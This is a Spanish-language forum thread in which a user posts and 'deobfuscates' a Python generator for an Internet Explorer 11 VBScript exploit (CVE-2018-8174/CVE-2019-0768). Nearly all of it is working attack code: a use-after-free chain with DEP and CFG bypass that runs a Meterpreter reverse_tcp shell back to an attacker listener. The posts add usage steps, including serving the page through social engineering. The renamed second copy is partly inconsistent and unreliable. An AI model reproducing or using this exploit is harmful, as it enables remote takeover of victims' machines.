Analizando supuesto Exploit en VBScript y Python de Internet Explorer 11
(1/1)
Bad4m_cod3:
Consegui este fragmento de codigo por un compañero. Lo dejo por aca para analizarlo con calma y poder trabajar con el sin abusar del Virtual Box.
Código
import sys
import subprocess
usage_text = """
Exploit Generator for CVE-2018-8174 & CVE-2019-0768
Prerequisite:
- Metasploit
- msfvenom
Usage: python ie11_vbscript.py [Listener IP] [Listener Port]
Instruction:
1. Use this script to generate "exploit.html"
2. Host the html file on your server
3. Setup a handler with windows/meterpreter/reverse_tcp in Metasploit
4. In your handler, set AutoRunScript with "post/windows/manage/migrate"
"""
if len(sys.argv) != 3:
print usage_text
sys.exit()
lhost = sys.argv[1]
lport = sys.argv[2]
#p = subprocess.call(["msfvenom","-p","windows/meterpreter/reverse_tcp","LHOST="+lhost])
p = subprocess.Popen(["msfvenom","-p","windows/meterpreter/reverse_tcp","LHOST="+lhost,"LPORT="+lport,"-b","'\\x00'","-f","js_le"],stdout=subprocess.PIPE)
out = p.communicate()
result = out[0]
payload = """
<!doctype html>
<html lang=\"en\">
<head>
<meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\">
<meta http-equiv=\"x-ua-compatible\" content=\"IE=5\">
<meta http-equiv=\"Expires\" content=\"0\">
<meta http-equiv=\"Pragma\" content=\"no-cache\">
<meta http-equiv=\"Cache-control\" content=\"no-cache\">
<meta http-equiv=\"Cache\" content=\"no-cache\">
</head>
<body>
<script language=\"VBScript.Encode\">
Dim lIIl
Dim IIIlI(6),IllII(6)
Dim IllI
Dim IIllI(40)
Dim lIlIIl,lIIIll
Dim IlII
Dim llll,IIIIl
Dim llllIl,IlIIII
Dim NtContinueAddr,VirtualProtectAddr
IlII=195948557
lIlIIl=Unescape(\"%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000\")
lIIIll=Unescape(\"%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000\")
IllI=195890093
Function IIIII(Domain)
lIlII=0
IllllI=0
IIlIIl=0
Id=CLng(Rnd*1000000)
lIlII=CLng((&h27d+8231-&H225b)*Rnd)Mod (&h137d+443-&H152f)+(&h1c17+131-&H1c99)
If(Id+lIlII)Mod (&h5c0+6421-&H1ed3)=(&h10ba+5264-&H254a) Then
lIlII=lIlII-(&h86d+6447-&H219b)
End If
IllllI=CLng((&h2bd+6137-&H1a6d)*Rnd)Mod (&h769+4593-&H1940)+(&h1a08+2222-&H2255)
IIlIIl=CLng((&h14e6+1728-&H1b5d)*Rnd)Mod (&hfa3+1513-&H1572)+(&h221c+947-&H256e)
IIIII=Domain &\"?\" &Chr(IllllI) &\"=\" &Id &\"&\" &Chr(IIlIIl) &\"=\" &lIlII
End Function
Function lIIII(ByVal lIlIl)
IIll=\"\"
For index=0 To Len(lIlIl)-1
IIll=IIll &lIlI(Asc(Mid(lIlIl,index+1,1)),2)
Next
IIll=IIll &\"00\"
If Len(IIll)/(&h15c6+3068-&H21c0) Mod (&h1264+2141-&H1abf)=(&hc93+6054-&H2438) Then
IIll=IIll &\"00\"
End If
For IIIl=(&h1a1a+3208-&H26a2) To Len(IIll)/(&h1b47+331-&H1c8e)-(&h14b2+4131-&H24d4)
lIIIlI=Mid(IIll,IIIl*(&h576+1268-&Ha66)+(&ha64+6316-&H230f),(&ha49+1388-&Hfb3))
lIlIll=Mid(IIll,IIIl*(&hf82+3732-&H1e12)+(&h210+2720-&Hcaf)+(&h4fa+5370-&H19f2),(&hf82+5508-&H2504))
lIIII=lIIII &\"%u\" &lIlIll &lIIIlI
Next
End Function
Function lIlI(ByVal Number,ByVal Length)
IIII=Hex(Number)
If Len(IIII)<Length Then
IIII=String(Length-Len(IIII),\"0\") &IIII \'pad allign with zeros
Else
IIII=Right(IIII,Length)
End If
lIlI=IIII
End Function
Function GetUint32(lIII)
Dim value
llll.mem(IlII+8)=lIII+4
llll.mem(IlII)=8 \'type string
value=llll.P0123456789
llll.mem(IlII)=2
GetUint32=value
End Function
Function IllIIl(lIII)
IllIIl=GetUint32(lIII) And (131071-65536)
End Function
Function lllII(lIII)
lllII=GetUint32(lIII) And (&h17eb+1312-&H1c0c)
End Function
Sub llllll
End Sub
Function GetMemValue
llll.mem(IlII)=(&h713+3616-&H1530)
GetMemValue=llll.mem(IlII+(&h169c+712-&H195c))
End Function
Sub SetMemValue(ByRef IlIIIl)
llll.mem(IlII+(&h715+3507-&H14c0))=IlIIIl
End Sub
Function LeakVBAddr
On Error Resume Next
Dim lllll
lllll=llllll
lllll=null
SetMemValue lllll
LeakVBAddr=GetMemValue()
End Function
Function GetBaseByDOSmodeSearch(IllIll)
Dim llIl
llIl=IllIll And &hffff0000
Do While GetUint32(llIl+(&h748+4239-&H176f))<>544106784 Or GetUint32(llIl+(&ha2a+7373-&H268b))<>542330692
llIl=llIl-65536
Loop
GetBaseByDOSmodeSearch=llIl
End Function
Function StrCompWrapper(lIII,llIlIl)
Dim lIIlI,IIIl
lIIlI=\"\"
For IIIl=(&ha2a+726-&Hd00) To Len(llIlIl)-(&h2e1+5461-&H1835)
lIIlI=lIIlI &Chr(lllII(lIII+IIIl))
Next
StrCompWrapper=StrComp(UCase(lIIlI),UCase(llIlIl))
End Function
Function GetBaseFromImport(base_address,name_input)
Dim import_rva,nt_header,descriptor,import_dir
Dim IIIIII
nt_header=GetUint32(base_address+(&h3c))
import_rva=GetUint32(base_address+nt_header+&h80)
import_dir=base_address+import_rva
descriptor=0
Do While True
Dim Name
Name=GetUint32(import_dir+descriptor*(&h14)+&hc)
If Name=0 Then
GetBaseFromImport=&hBAAD0000
Exit Function
Else
If StrCompWrapper(base_address+Name,name_input)=0 Then
Exit Do
End If
End If
descriptor=descriptor+1
Loop
IIIIII=GetUint32(import_dir+descriptor*(&h14)+&h10)
GetBaseFromImport=GetBaseByDOSmodeSearch(GetUint32(base_address+IIIIII))
End Function
Function GetProcAddr(dll_base,name)
Dim p,export_dir,index
Dim function_rvas,function_names,function_ordin
Dim Illlll
p=GetUint32(dll_base+&h3c)
p=GetUint32(dll_base+p+&h78)
export_dir=dll_base+p
function_rvas=dll_base+GetUint32(export_dir+&h1c)
function_names=dll_base+GetUint32(export_dir+&h20)
function_ordin=dll_base+GetUint32(export_dir+&h24)
index=0
Do While True
Dim lllI
lllI=GetUint32(function_names+index*4)
If StrCompWrapper(dll_base+lllI,name)=0 Then
Exit Do
End If
index=index+1
Loop
Illlll=IllIIl(function_ordin+index*2)
p=GetUint32(function_rvas+Illlll*4)
GetProcAddr=dll_base+p
End Function
Function GetShellcode()
IIlI=Unescape(\"%u0000%u0000%u0000%u0000\") &Unescape(\"{shellcode}\" &lIIII(IIIII(\"\")))
IIlI=IIlI & String((&h80000-LenB(IIlI))/2,Unescape(\"%u4141\"))
GetShellcode=IIlI
End Function
Function EscapeAddress(ByVal value)
Dim High,Low
High=lIlI((value And &hffff0000)/&h10000,4)
Low=lIlI(value And &hffff,4)
EscapeAddress=Unescape(\"%u\" &Low &\"%u\" &High)
End Function
Function lIllIl
Dim IIIl,IlllI,IIlI,IlIII,llllI,llIII,lIllI
IlllI=lIlI(NtContinueAddr,8)
IlIII=Mid(IlllI,1,2)
llllI=Mid(IlllI,3,2)
llIII=Mid(IlllI,5,2)
lIllI=Mid(IlllI,7,2)
IIlI=\"\"
IIlI=IIlI &\"%u0000%u\" &lIllI &\"00\"
For IIIl=1 To 3
IIlI=IIlI &\"%u\" &llllI &llIII
IIlI=IIlI &\"%u\" &lIllI &IlIII
Next
IIlI=IIlI &\"%u\" &llllI &llIII
IIlI=IIlI &\"%u00\" &IlIII
lIllIl=Unescape(IIlI)
End Function
Function WrapShellcodeWithNtContinueContext(ShellcodeAddrParam) \'bypass cfg
Dim IIlI
IIlI=String((100334-65536),Unescape(\"%u4141\"))
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam)
IIlI=IIlI &EscapeAddress(&h3000)
IIlI=IIlI &EscapeAddress(&h40)
IIlI=IIlI &EscapeAddress(ShellcodeAddrParam-8)
IIlI=IIlI &String(6,Unescape(\"%u4242\"))
IIlI=IIlI &lIllIl()
IIlI=IIlI &String((&h80000-LenB(IIlI))/2,Unescape(\"%u4141\"))
WrapShellcodeWithNtContinueContext=IIlI
End Function
Function ExpandWithVirtualProtect(lIlll)
Dim IIlI
Dim lllllI
lllllI=lIlll+&h23
IIlI=\"\"
IIlI=IIlI &EscapeAddress(lllllI)
IIlI=IIlI &String((&hb8-LenB(IIlI))/2,Unescape(\"%4141\"))
IIlI=IIlI &EscapeAddress(VirtualProtectAddr)
IIlI=IIlI &EscapeAddress(&h1b)
IIlI=IIlI &EscapeAddress(0)
IIlI=IIlI &EscapeAddress(lIlll)
IIlI=IIlI &EscapeAddress(&h23)
IIlI=IIlI &String((&400-LenB(IIlI))/2,Unescape(\"%u4343\"))
ExpandWithVirtualProtect=IIlI
End Function
Sub ExecuteShellcode
llll.mem(IlII)=&h4d \'DEP bypass
llll.mem(IlII+8)=0
msgbox(IlII) \'VT replaced
End Sub
Class cla1
Private Sub Class_Terminate()
Set IIIlI(IllI)=lIIl((&h1078+5473-&H25d8))
IllI=IllI+(&h14b5+2725-&H1f59)
lIIl((&h79a+3680-&H15f9))=(&h69c+1650-&Hd0d)
End Sub
End Class
Class cla2
Private Sub Class_Terminate()
Set IllII(IllI)=lIIl((&h15b+3616-&Hf7a))
IllI=IllI+(&h880+542-&Ha9d)
lIIl((&h1f75+342-&H20ca))=(&had3+3461-&H1857)
End Sub
End Class
Class IIIlIl
End Class
Class llIIl
Dim mem
Function P
End Function
Function SetProp(Value)
mem=Value
SetProp=0
End Function
End Class
Class IIIlll
Dim mem
Function P0123456789
P0123456789=LenB(mem(IlII+8))
End Function
Function SPP
End Function
End Class
Class lllIIl
Public Default Property Get P
Dim llII
P=174088534690791e-324
For IIIl=(&h7a0+4407-&H18d7) To (&h2eb+1143-&H75c)
IIIlI(IIIl)=(&h2176+711-&H243d)
Next
Set llII=New IIIlll
llII.mem=lIlIIl
For IIIl=(&h1729+3537-&H24fa) To (&h1df5+605-&H204c)
Set IIIlI(IIIl)=llII
Next
End Property
End Class
Class llllII
Public Default Property Get P
Dim llII
P=636598737289582e-328
For IIIl=(&h1063+2314-&H196d) To (&h4ac+2014-&Hc84)
IllII(IIIl)=(&h442+2598-&He68)
Next
Set llII=New IIIlll
llII.mem=lIIIll
For IIIl=(&h7eb+3652-&H162f) To (&h3e8+1657-&Ha5b)
Set IllII(IIIl)=llII
Next
End Property
End Class
Set llllIl=New lllIIl
Set IlIIII=New llllII
Sub UAF
For IIIl=(&hfe8+3822-&H1ed6) To (&h8b+8633-&H2233)
Set IIllI(IIIl)=New IIIlIl
Next
For IIIl=(&haa1+6236-&H22e9) To (&h1437+3036-&H1fed)
Set IIllI(IIIl)=New llIIl
Next
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla1
Erase lIIl
Next
Set llll=New llIIl
IllI=0
For IIIl=0 To 6
ReDim lIIl(1)
Set lIIl(1)=New cla2
Erase lIIl
Next
Set IIIIl=New llIIl
End Sub
Sub InitObjects
llll.SetProp(llllIl)
IIIIl.SetProp(IlIIII)
IlII=IIIIl.mem
End Sub
Sub StartExploit
UAF
InitObjects
vb_adrr=LeakVBAddr()
//Alert \"CScriptEntryPointObject Leak: 0x\" & Hex(vb_adrr) & vbcrlf & \"VirtualTable address: 0x\" & Hex(GetUint32(vb_adrr))
vbs_base=GetBaseByDOSmodeSearch(GetUint32(vb_adrr))
//Alert \"VBScript Base: 0x\" & Hex(vbs_base)
msv_base=GetBaseFromImport(vbs_base,\"msvcrt.dll\")
//Alert \"MSVCRT Base: 0x\" & Hex(msv_base)
krb_base=GetBaseFromImport(msv_base,\"kernelbase.dll\")
//Alert \"KernelBase Base: 0x\" & Hex(krb_base)
ntd_base=GetBaseFromImport(msv_base,\"ntdll.dll\")
//Alert \"Ntdll Base: 0x\" & Hex(ntd_base)
VirtualProtectAddr=GetProcAddr(krb_base,\"VirtualProtect\")
//Alert \"KernelBase!VirtualProtect Address 0x\" & Hex(VirtualProtectAddr)
NtContinueAddr=GetProcAddr(ntd_base,\"NtContinue\")
//Alert \"KernelBase!VirtualProtect Address 0x\" & Hex(NtContinueAddr)
SetMemValue GetShellcode()
ShellcodeAddr=GetMemValue()+8
//Alert \"Shellcode Address 0x\" & Hex(ShellcodeAddr)
SetMemValue WrapShellcodeWithNtContinueContext(ShellcodeAddr)
lIlll=GetMemValue()+69596
SetMemValue ExpandWithVirtualProtect(lIlll)
llIIll=GetMemValue()
ExecuteShellcode
Alert \"Executing Shellcode\"
End Sub
StartExploit
</script>
</body>
</html>
""".format(shellcode=result)
f = open("exploit.html", "w")
f.write(payload)
Aun no se que hace exactamente, pero me tomare el tiempo de decodificarlo y analizarlo bien.
Saludos
Bad4m_cod3:
Información del exploit
Nombre Descriptivo: IE11 VBScript ExploitExploit Generator for CVE-2018-8174 & CVE-2019-0768 (RCE via VBScript Execution in IE11)Credito: https://www.exploit-db.com/exploits/44741CVE: https://nvd.nist.gov/vuln/detail/CVE-2019-0768, https://nvd.nist.gov/vuln/detail/CVE-2018-8174Instruciones de uso
1. Usar el Script generado "exploit.html"2. Host del fichero HTML es tu servidor3. Configurar con windows/meterpreter/reverse_tcp en Metasploit4. set AutoRunScript en "post/windows/manage/migrate"5. usar ataque de ingenieria social para el payload url
Saludos
Bad4m_cod3:
Codigo Decodificado
Analizando y reescribiendo las variables eliminando la molesta ofuscacion podemos entender mejor la funcionalidad del mismo. Pues bien, aunque ya existe documentacion no esta demas investigar y profundizar realizando algo de ingenieria inversa.
Código
import sys
import subprocess
usage_text = """
Exploit Generator for CVE-2018-8174 & CVE-2019-0768
Prerequisite:
- Metasploit
- msfvenom
Usage: python ie11_vbscript.py [Listener IP] [Listener Port]
Instruction:
1. Use this script to generate "exploit.html"
2. Host the html file on your server
3. Setup a handler with windows/meterpreter/reverse_tcp in Metasploit
4. In your handler, set AutoRunScript with "post/windows/manage/migrate"
"""
if len(sys.argv) != 3:
print(usage_text)
sys.exit()
listener_ip = sys.argv[1]
listener_port = sys.argv[2]
process = subprocess.Popen(["msfvenom", "-p", "windows/meterpreter/reverse_tcp", "LHOST=" + listener_ip, "LPORT=" + listener_port, "-b", "'\\x00'", "-f", "js_le"], stdout=subprocess.PIPE)
output = process.communicate()
payload_result = output[0]
payload = """
<!doctype html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-ua-compatible" content="IE=5">
<meta http-equiv="Expires" content="0">
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="Cache-control" content="no-cache">
<meta http-equiv="Cache" content="no-cache">
</head>
<body>
<script language="VBScript.Encode">
(Exploit Code VBScript)
</script>
</body>
</html>
"""
with open("exploit.html", "w") as f:
f.write(payload)
En "(Exploit Code VBScript)" esta etiqueta no es mas que el codigo VBScript con variables renombradas acontinuación.
Código
Dim scriptVariable
Dim array1(6), array2(6)
Dim someVariable
Dim memoryArray(40)
Dim address1, address2
Dim variable1
Dim counter1, counter2
Dim variable2, variable3
Dim continueAddress, virtualProtectAddress
variable1 = 195948557
address1 = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uffff%u7fff%u0000%u0000")
address2 = Unescape("%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000")
someVariable = 195890093
Function generateQuery(Domain)
scriptVariable = 0
randomValue1 = 0
randomValue2 = 0
randomId = CLng(Rnd * 1000000)
scriptVariable = CLng((&h27d + 8231 - &H225b) * Rnd) Mod (&h137d + 443 - &H152f) + (&h1c17 + 131 - &H1c99)
If (randomId + scriptVariable) Mod (&h5c0 + 6421 - &H1ed3) = (&h10ba + 5264 - &H254a) Then
scriptVariable = scriptVariable - (&h86d + 6447 - &H219b)
End If
randomValue1 = CLng((&h2bd + 6137 - &H1a6d) * Rnd) Mod (&h769 + 4593 - &H1940) + (&h1a08 + 2222 - &H2255)
randomValue2 = CLng((&h14e6 + 1728 - &H1b5d) * Rnd) Mod (&hfa3 + 1513 - &H1572) + (&h221c + 947 - &H256e)
generateQuery = Domain & "?" & Chr(randomValue1) & "=" & randomId & "&" & Chr(randomValue2) & "=" & scriptVariable
End Function
Function encodeString(ByVal inputString)
Dim encodedString
encodedString = ""
For index = 0 To Len(inputString) - 1
encodedString = encodedString & convertToHex(Asc(Mid(inputString, index + 1, 1)), 2)
Next
encodedString = encodedString & "00"
If Len(encodedString) / (&h15c6 + 3068 - &H21c0) Mod (&h1264 + 2141 - &H1abf) = (&hc93 + 6054 - &H2438) Then
encodedString = encodedString & "00"
End If
For i = (&h1a1a + 3208 - &H26a2) To Len(encodedString) / (&h1b47 + 331 - &H1c8e) - (&h14b2 + 4131 - &H24d4)
part1 = Mid(encodedString, i * (&h576 + 1268 - &Ha66) + (&ha64 + 6316 - &H230f), (&ha49 + 1388 - &Hfb3))
part2 = Mid(encodedString, i * (&hf82 + 3732 - &H1e12) + (&h210 + 2720 - &Hcaf) + (&h4fa + 5370 - &H19f2), (&hf82 + 5508 - &H2504))
encodeString = encodeString & "%u" & part2 & part1
Next
End Function
Function getUint32(value)
Dim result
memoryArray.mem(variable1 + 8) = value + 4
result = memoryArray.mem(variable1)
memoryArray.mem(variable1) = 2
getUint32 = result
End Function
Function leakVBScriptAddress()
On Error Resume Next
Dim temp
temp = someVariable
temp = null
setMemoryValue temp
leakVBScriptAddress = getMemoryValue()
End Function
Function getBaseAddressByDOSmodeSearch(importAddress)
Dim baseAddress
baseAddress = importAddress And &hffff0000
Do While getUint32(baseAddress + (&h748 + 4239 - &H176f)) <> 544106784 Or getUint32(baseAddress + (&ha2a + 7373 - &H268b)) <> 542330692
baseAddress = baseAddress - 65536
Loop
getBaseAddressByDOSmodeSearch = baseAddress
End Function
Function compareStringsWrapper(value1, value2)
Dim tempString
tempString = ""
For i = (&ha2a + 726 - &Hd00) To Len(value2) - (&h2e1 + 5461 - &H1835)
tempString = tempString & Chr(getUint32(value1 + i))
Next
compareStringsWrapper = StrComp(UCase(tempString), UCase(value2))
End Function
Function getBaseFromImport(baseAddress, dllName)
Dim importRVA, ntHeader, descriptor, importDirectory
Dim functionAddress
ntHeader = getUint32(baseAddress + (&h3c))
importRVA = getUint32(baseAddress + ntHeader + &h80)
importDirectory = baseAddress + importRVA
descriptor = 0
Do While True
Dim name
name = getUint32(importDirectory + descriptor * (&h14) + &hc)
If name = 0 Then
getBaseFromImport = &hBAAD0000
Exit Function
Else
If compareStringsWrapper(baseAddress + name, dllName) = 0 Then
Exit Do
End If
End If
descriptor = descriptor + 1
Loop
functionAddress = getUint32(importDirectory + descriptor * (&h14) + &h10)
getBaseFromImport = getBaseAddressByDOSmodeSearch(getUint32(baseAddress + functionAddress))
End Function
Function getProcAddress(dllBase, functionName)
Dim exportDirectory, index
Dim functionRVAs, functionNames, functionOrdinals
Dim functionAddress
exportDirectory = getUint32(dllBase + &h3c)
exportDirectory = getUint32(dllBase + exportDirectory + &h78)
exportDirectory = dllBase + exportDirectory
functionRVAs = dllBase + getUint32(exportDirectory + &h1c)
functionNames = dllBase + getUint32(exportDirectory + &h20)
functionOrdinals = dllBase + getUint32(exportDirectory + &h24)
index = 0
Do While True
Dim functionNameAddress
functionNameAddress = getUint32(functionNames + index * 4)
If compareStringsWrapper(dllBase + functionNameAddress, functionName) = 0 Then
Exit Do
End If
index = index + 1
Loop
functionAddress = getUint32(functionOrdinals + index * 2)
getProcAddress = dllBase + functionAddress
End Function
Function getShellcode()
Dim shellcode
shellcode = Unescape("%u0000%u0000%u0000%u0000") & Unescape("{shellcode}" & encodeString(generateQuery("")))
shellcode = shellcode & String((&h80000 - LenB(shellcode)) / 2, Unescape("%u4141"))
getShellcode = shellcode
End Function
Function escapeAddress(ByVal value)
Dim highPart, lowPart
highPart = convertToHex((value And &hffff0000) / &h10000, 4)
lowPart = convertToHex(value And &hffff, 4)
escapeAddress = Unescape("%u" & lowPart & "%u" & highPart)
End Function
Function prepareShellcode()
Dim shellcodeString, part1, part2, part3, part4
part1 = convertToHex(continueAddress, 8)
part2 = Mid(part1, 1, 2)
part3 = Mid(part1, 3, 2)
part4 = Mid(part1, 5, 2)
shellcodeString = ""
shellcodeString = shellcodeString & "%u0000%u" & part4 & "00"
For i = 1 To 3
shellcodeString = shellcodeString & "%u" & part3 & part2
shellcodeString = shellcodeString & "%u" & part4 & part2
Next
shellcodeString = shellcodeString & "%u" & part3 & part2
shellcodeString = shellcodeString & "%u00" & part2
prepareShellcode = Unescape(shellcodeString)
End Function
Function wrapShellcodeWithNtContinueContext(shellcodeAddress)
Dim shellcodeWrapper
shellcodeWrapper = String((100334 - 65536), Unescape("%u4141"))
shellcodeWrapper = shellcodeWrapper & escapeAddress(shellcodeAddress)
shellcodeWrapper = shellcodeWrapper & escapeAddress(shellcodeAddress)
shellcodeWrapper = shellcodeWrapper & escapeAddress(&h3000)
shellcodeWrapper = shellcodeWrapper & escapeAddress(&h40)
shellcodeWrapper = shellcodeWrapper & escapeAddress(shellcodeAddress - 8)
shellcodeWrapper = shellcodeWrapper & String(6, Unescape("%u4242"))
shellcodeWrapper = shellcodeWrapper & prepareShellcode()
shellcodeWrapper = shellcodeWrapper & String((&h80000 - LenB(shellcodeWrapper)) / 2, Unescape("%u4141"))
wrapShellcodeWithNtContinueContext = shellcodeWrapper
End Function
Function expandWithVirtualProtect(shellcodeLocation)
Dim virtualProtectExpansion
Dim adjustedLocation
adjustedLocation = shellcodeLocation + &h23
virtualProtectExpansion = ""
virtualProtectExpansion = virtualProtectExpansion & escapeAddress(adjustedLocation)
virtualProtectExpansion = virtualProtectExpansion & String((&hb8 - LenB(virtualProtectExpansion)) / 2, Unescape("%4141"))
virtualProtectExpansion = virtualProtectExpansion & escapeAddress(virtualProtectAddress)
virtualProtectExpansion = virtualProtectExpansion & escapeAddress(&h1b)
virtualProtectExpansion = virtualProtectExpansion & escapeAddress(0)
virtualProtectExpansion = virtualProtectExpansion & escapeAddress(shellcodeLocation)
virtualProtectExpansion = virtualProtectExpansion & escapeAddress(&h23)
virtualProtectExpansion = virtualProtectExpansion & String((&400 - LenB(virtualProtectExpansion)) / 2, Unescape("%u4343"))
expandWithVirtualProtect = virtualProtectExpansion
End Function
Sub executeShellcode()
memoryArray.mem(variable1) = &h4D ' DEP bypass
memoryArray.mem(variable1 + 8) = 0
msgbox(variable1) ' VT replaced
End Sub
Class Class1
Private Sub Class_Terminate()
Set array1(IllI) = allocateMemory((&h1078 + 5473 - &H25d8))
IllI = IllI + (&h14b5 + 2725 - &H1f59)
allocateMemory((&h79a + 3680 - &H15f9)) = (&h69c + 1650 - &Hd0d)
End Sub
End Class
Class Class2
Private Sub Class_Terminate()
Set array2(IllI) = allocateMemory((&h15b + 3616 - &Hf7a))
IllI = IllI + (&h880 + 542 - &Ha9d)
allocateMemory((&h1f75 + 342 - &H20ca)) = (&had3 + 3461 - &H1857)
End Sub
End Class
Class Class3
End Class
Class MemoryClass
Dim memory
Function P
End Function
Function SetProperty(Value)
memory = Value
SetProperty = 0
End Function
End Class
Class MemoryAccessClass
Dim memory
Function GetMemoryLength
GetMemoryLength = LenB(memory(variable1 + 8))
End Function
Function SPP
End Function
End Class
Class MemoryHandlerClass
Public Default Property Get P
Dim temp
P = 174088534690791e-324
For i = (&h7a0 + 4407 - &H18d7) To (&h2eb + 1143 - &H75c)
array1(i) = (&h2176 + 711 - &H243d)
Next
Set temp = New MemoryAccessClass
temp.memory = address1
For i = (&h1729 + 3537 - &H24fa) To (&h1df5 + 605 - &H204c)
Set array1(i) = temp
Next
End Property
End Class
Class MemoryHandlerClass2
Public Default Property Get P
Dim temp
P = 636598737289582e-328
For i = (&h1063 + 2314 - &H196d) To (&h4ac + 2014 - &Hc84)
array2(i) = (&h442 + 2598 - &He68)
Next
Set temp = New MemoryAccessClass
temp.memory = address2
For i = (&h7eb + 3652 - &H162f) To (&h3e8 + 1657 - &Ha5b)
Set array2(i) = temp
Next
End Property
End Class
Set memoryHandler1 = New MemoryHandlerClass
Set memoryHandler2 = New MemoryHandlerClass2
Sub useAfterFree()
For i = (&hfe8 + 3822 - &H1ed6) To (&h8b + 8633 - &H2233)
Set array1(i) = New Class1
Next
For i = (&haa1 + 6236 - &H22e9) To (&h1437 + 3036 - &H1fed)
Set array1(i) = New Class2
Next
IllI = 0
For i = 0 To 6
ReDim array1(1)
Set array1(1) = New Class1
Erase array1
Next
Set memoryHandler = New MemoryClass
IllI = 0
For i = 0 To 6
ReDim array1(1)
Set array1(1) = New Class2
Erase array1
Next
Set memoryHandler2 = New MemoryClass
End Sub
Sub initializeObjects()
memoryHandler.SetProperty(memoryHandler1)
memoryHandler2.SetProperty(memoryHandler2)
variable1 = memoryHandler2.memory
End Sub
Sub startExploit()
useAfterFree()
initializeObjects()
vbScriptAddress = leakVBScriptAddress()
' Alert "CScriptEntryPointObject Leak: 0x" & Hex(vbScriptAddress) & vbcrlf & "VirtualTable address: 0x" & Hex(getUint32(vbScriptAddress))
vbScriptBase = getBaseAddressByDOSmodeSearch(getUint32(vbScriptAddress))
' Alert "VBScript Base: 0x" & Hex(vbScriptBase)
msvcrtBase = getBaseFromImport(vbScriptBase, "msvcrt.dll")
' Alert "MSVCRT Base: 0x" & Hex(msvcrtBase)
kernelBase = getBaseFromImport(msvcrtBase, "kernelbase.dll")
' Alert "KernelBase Base: 0
' Alert "KernelBase Base: 0x" & Hex(kernelBase)
ntdllBase = getBaseFromImport(msvcrtBase, "ntdll.dll")
' Alert "Ntdll Base: 0x" & Hex(ntdllBase)
virtualProtectAddress = getProcAddress(kernelBase, "VirtualProtect")
' Alert "KernelBase!VirtualProtect Address 0x" & Hex(virtualProtectAddress)
ntContinueAddress = getProcAddress(ntdllBase, "NtContinue")
' Alert "KernelBase!NtContinue Address 0x" & Hex(ntContinueAddress)
setMemoryValue getShellcode()
shellcodeAddress = getMemoryValue() + 8
' Alert "Shellcode Address 0x" & Hex(shellcodeAddress)
setMemoryValue wrapShellcodeWithNtContinueContext(shellcodeAddress)
locationToExpand = getMemoryValue() + 69596
setMemoryValue expandWithVirtualProtect(locationToExpand)
finalMemoryValue = getMemoryValue()
executeShellcode
Alert "Executing Shellcode"
End Sub
startExploit()
En el proximo mensaje describo a detalle los datos de funcionamiento y si logro entenderlo la explicación detallada.
Saludos Black Hacker
Navegación